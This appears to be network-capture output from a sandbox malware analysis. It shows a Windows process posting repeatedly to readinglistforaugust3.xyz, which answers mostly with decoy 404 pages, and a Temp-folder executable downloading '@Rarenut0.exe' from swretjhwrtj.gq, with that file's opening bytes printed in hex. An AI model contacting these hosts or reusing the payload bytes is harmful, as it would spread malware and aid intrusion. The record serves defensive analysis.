Aug 24, 2021 08:49:27.437546968 CEST	14819	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:27.454819918 CEST	14825	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 199 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:27.501940966 CEST	14842	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:27.509788990 CEST	14848	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 361 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:27.557979107 CEST	14861	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:27.636507034 CEST	15237	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 243 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:27.682234049 CEST	15238	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:27.751362085 CEST	15238	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 359 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:27.798177004 CEST	15239	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 42 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 00 00 a7 a2 7f d5 7f 6b 10 19 36 87 8f bf a7 46 90 6c 01 45 fc 39 0d 14 62 da 02 52 f8 bf 97 c8 20 8c 91 ea 4d 83 8e a6 e6 5a Data Ascii: k6FlE9bR MZ
Aug 24, 2021 08:49:28.633219004 CEST	15658	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 157 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:28.682420969 CEST	15659	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:28.691448927 CEST	15660	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 312 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:28.748506069 CEST	15661	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:28.845273018 CEST	15661	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 295 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:28.898721933 CEST	15662	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:28.999334097 CEST	15663	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 208 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:29.051706076 CEST	15663	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:29 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=3

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49717	172.67.216.236	80	C:\Users\user\AppData\Local\Temp\B72.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:49:20.971307993 CEST	10741	OUT	GET /@Rarenut0.exe HTTP/1.1 Host: swretjhwrtj.gq Connection: Keep-Alive
Aug 24, 2021 08:49:20.996407032 CEST	10743	IN	HTTP/1.1 200 OK Date: Tue, 24 Aug 2021 06:49:20 GMT Content-Type: application/x-msdos-program Content-Length: 109568 Connection: keep-alive last-modified: Mon, 23 Aug 2021 18:01:19 GMT etag: "1ac00-5ca3dcddc8b80" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 4960 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jYT9%2B1I%2BjjAnm2XWT560m1mLsoq%2FbAP8fujchcVFmM7uWppTk1X2%2FmDet944LkCTZRvTuoKplne%2FOHLA1lCoWYZdKmeGVf18CDkHhv376zg993Y7Fvatv4dyvu29cINpcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 683aa3e21b202b89-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 4b b7 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9c 01 00 00 0c 00 00 00 00 00 00 aa a6 01 00 00 20 00 00 00 c0 01 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a6 01 00 4f 00 00 00 00 c0 01 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 0c 00 00 00 3c a6 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 98 01 00 00 20 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 04 00 00 00 c0 01 00 00 08 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 01 00 00 04 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZK0 @ @XO< H.text `.rsrc@@.reloc@B
Aug 24, 2021 08:49:20.996428967 CEST	10744	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Aug 24, 2021 08:49:20.996452093 CEST	10746	IN	Data Raw: 00 01 02 00 00 00 9b 00 00 00 21 02 00 00 bc 02 00 00 0e 00 00 00 00 00 00 00 02 00 00 00 31 00 00 00 a6 02 00 00 d7 02 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 dd 02 00 00 e3 02 00 00 03 00 00 00 0a 00 00 01 1b 30 04 00 7c 01 00 00 Data Ascii: !10\|s7R%(s(8(9-G(sosR%(so&8s?oo:o:o
Aug 24, 2021 08:49:20.996483088 CEST	10747	IN	Data Raw: 00 00 04 28 1e 00 00 0a 73 1f 00 00 0a 28 38 00 00 0a 0b 07 28 39 00 00 0a 2d 07 06 0d dd 32 01 00 00 02 28 08 00 00 06 0c 73 e8 00 00 06 13 04 11 04 07 6f e1 00 00 06 73 a3 00 00 06 13 05 11 05 1e 8d 52 00 00 01 25 d0 a7 00 00 04 28 1e 00 00 0a Data Ascii: (s(8(9-2(sosR%(so&8R%(soo:R%(so?-R%(so?,(sR%(
Aug 24, 2021 08:49:20.996488094 CEST	10748	IN	Data Raw: 73 1f 00 00 0a 28 38 00 00 0a 0b 07 28 39 00 00 0a 2d 2e 09 17 58 0d 38 57 ff ff ff 09 19 40 50 ff ff ff 02 1f 0f 8d 52 00 00 01 25 d0 df 00 00 04 28 1e 00 00 0a 73 1f 00 00 0a 28 38 00 00 0a 0b 07 28 39 00 00 0a 2c 30 73 e8 00 00 06 13 04 07 28 Data Ascii: s(8(9-.X8W@PR%(s(8(9,0s(R(+oo,o&&AL-81=0}s7R%(s
Aug 24, 2021 08:49:20.996505976 CEST	10750	IN	Data Raw: 2a 00 00 00 41 64 00 00 02 00 00 00 7a 00 00 00 de 00 00 00 58 01 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 3d 00 00 00 2b 01 00 00 68 01 00 00 03 00 00 00 0a 00 00 01 02 00 00 00 31 00 00 00 47 01 00 00 78 01 00 00 0a 00 00 00 00 00 00 00 00 00 Data Ascii: *AdzX=+h1Gx~0s>R%(s(8(9-sosR%(so&8as/
Aug 24, 2021 08:49:20.996522903 CEST	10751	IN	Data Raw: 3b 00 00 0a 2d 6e 11 0b 28 3b 00 00 0a 2d 65 28 61 00 00 0a 11 0a 28 4b 00 00 0a 6f 62 00 00 0a 13 0c 28 61 00 00 0a 11 0b 28 4b 00 00 0a 6f 62 00 00 0a 11 0c 17 14 28 23 00 00 06 13 0d 17 14 28 23 00 00 06 13 0e 11 0d 28 3b 00 00 0a 2d 24 11 0e Data Ascii: ;-n(;-e(a(Kob(a(Kob(#(#(;-$(;-s?%o<%o>o=&Xi?Xi?&*A4"(c0?rop
Aug 24, 2021 08:49:20.996546984 CEST	10752	IN	Data Raw: 00 0a 02 6f 70 00 00 0a 0a 06 6f 7d 00 00 0a 28 26 00 00 06 72 b0 03 00 70 7e 22 00 00 0a 6f 48 00 00 0a 2a 13 30 03 00 bd 00 00 00 18 00 00 11 7e 22 00 00 0a 0a 16 0b 38 a2 00 00 00 02 07 6f 7e 00 00 0a 25 1f 0f 5f 0c 1a 63 1f 0f 5f 0d 09 1f 09 Data Ascii: opo}(&rp~"oH0~"8o~%_c_1YAX(((,+(((,1YAX(((,+(((,Xo.X]-rp(,Xo?R0
Aug 24, 2021 08:49:20.996567011 CEST	10754	IN	Data Raw: 00 05 0f 00 00 01 1b 30 02 00 16 00 00 00 1c 00 00 11 02 7b 01 00 00 04 03 6f fe 00 00 06 0a de 05 26 16 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 0f 0f 00 05 0f 00 00 01 1b 30 02 00 16 00 00 00 1c 00 00 11 02 7b 01 00 00 04 03 6f 08 01 00 06 Data Ascii: 0{o&0{o&0{o&0{o&0{o&
